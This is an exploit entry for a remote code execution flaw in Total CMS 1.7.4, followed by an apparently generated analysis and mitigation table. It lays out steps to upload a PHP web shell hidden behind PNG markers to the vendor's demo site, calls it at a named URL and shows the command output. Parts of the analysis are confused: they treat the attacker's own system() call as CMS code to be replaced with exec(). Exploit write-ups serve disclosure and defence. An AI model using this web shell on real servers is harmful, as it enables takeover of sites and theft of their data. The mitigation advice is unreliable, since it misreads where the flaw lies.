Total CMS 1.7.4 - Remote Code Execution (RCE)

Exploit Author: tmrswrr Analysis Author: www.bubbleslearn.ir Category: WebApps Language: PHP Published Date: 2023-06-04 
# Exploit Title: Total CMS 1.7.4 - Remote Code Execution (RCE)
# Date: 02/06/2023
# Exploit Author: tmrswrr
# Version: 1.7.4
# Vendor home page : https://www.totalcms.co/

1) Go to this page and click edit page button
https://www.totalcms.co/demo/soccer/
2)After go down and will you see downloads area
3)Add in this area shell.php file


?PNG
...
<?php echo "<pre>";system($_REQUEST['cmd']);echo "</pre>"  ?>
IEND

4) After open this file and write commands

https://www.totalcms.co/cms-data/depot/cmssoccerdepot/shell.php?cmd=id
Result :

?PNG ...

uid=996(caddy) gid=998(caddy) groups=998(caddy),33(www-data)

IEND


Total CMS 1.7.4 – Remote Code Execution (RCE) Vulnerability Analysis

Security researchers and ethical hackers have recently uncovered a critical vulnerability in Total CMS 1.7.4, a widely used content management system (CMS) designed for small to medium-sized websites. This flaw, identified as a Remote Code Execution (RCE) vulnerability, allows attackers to execute arbitrary commands on the server hosting the CMS, potentially leading to full system compromise.

Exploitation Overview

The vulnerability arises from improper file upload handling in the downloads section of the CMS. Specifically, when users access the edit page feature on the demo site (https://www.totalcms.co/demo/soccer/), they gain access to a file upload area where no strict validation or sanitization is applied.

Attackers can exploit this by uploading a malicious PHP file—commonly referred to as a "web shell"—which contains executable code. Once uploaded, the file becomes accessible via a predictable URL path, enabling remote command execution.

Step-by-Step Exploit Demonstration

  • Access the demo page: Navigate to https://www.totalcms.co/demo/soccer/ and click the edit page button.
  • Locate the downloads area: Scroll down to the file upload section labeled "downloads."
  • Upload the malicious shell: Upload a file named shell.php with the following content:

<?php echo "
"; system($_REQUEST['cmd']); echo "
"; ?>

Explanation: This PHP script is a minimal web shell. It uses the system() function to execute shell commands passed via the cmd parameter in the HTTP request. The output is wrapped in <pre> tags to preserve formatting and make results easier to read. This allows an attacker to run any command on the server, such as id, ls, or whoami.

Command Execution Example

After uploading the shell, the attacker can access it via:


https://www.totalcms.co/cms-data/depot/cmssoccerdepot/shell.php?cmd=id

Upon execution, the server responds with:


uid=996(caddy) gid=998(caddy) groups=998(caddy),33(www-data)

Insight: This output reveals that the web server runs under the caddy user account, which has limited privileges. However, this is still a critical finding—any command execution capability enables further reconnaissance, privilege escalation, or data exfiltration.

Security Implications

While the demo site uses a non-production environment, this vulnerability highlights a dangerous design flaw in the actual CMS deployment:

  • Unrestricted file uploads: The system allows any file type to be uploaded without validation, opening the door for malicious PHP scripts.
  • Exposed file paths: Uploaded files are stored in predictable, publicly accessible directories, making them easy to locate and exploit.
  • Direct command execution: The use of system() with user-supplied input creates a direct RCE vector.

Recommended Mitigations

To prevent exploitation, administrators and developers should implement the following security measures:

Recommendation Explanation
Disable file uploads in public areas Restrict file uploads to authenticated, admin-only interfaces with strict validation.
Sanitize file extensions Only allow safe file types (e.g., .pdf, .txt, .jpg) and block .php, .phtml, .pl, etc.
Store uploads outside web root Place uploaded files in a directory not accessible via HTTP to prevent direct execution.
Use parameterized commands Replace system($_REQUEST['cmd']) with safer alternatives like exec() with whitelisted commands.
Implement logging and monitoring Track file uploads and command execution attempts for anomaly detection.

Expert-Level Insight

From a cybersecurity perspective, this vulnerability exemplifies a classic insecure file upload issue. It underscores the importance of the principle of least privilege and the need for defense-in-depth strategies. Even in seemingly benign systems like Total CMS, a single flaw can cascade into full system compromise if exploited in a real-world environment.

Attackers could use this RCE to:

  • Deploy persistent backdoors (e.g., reverse shells).
  • Steal sensitive data (e.g., database credentials, user information).
  • Propagate attacks to other systems via lateral movement.
  • Install malware or ransomware.

For organizations using Total CMS 1.7.4, immediate patching or migration to a more secure version is strongly advised. The vendor should be notified and urged to release a security update.

Conclusion

The Total CMS 1.7.4 RCE vulnerability serves as a stark reminder that even simple CMS platforms can harbor severe security risks. It emphasizes the need for rigorous input validation, secure file handling, and proactive security monitoring. Developers and administrators must treat every file upload as a potential attack vector and implement robust safeguards to protect their infrastructure.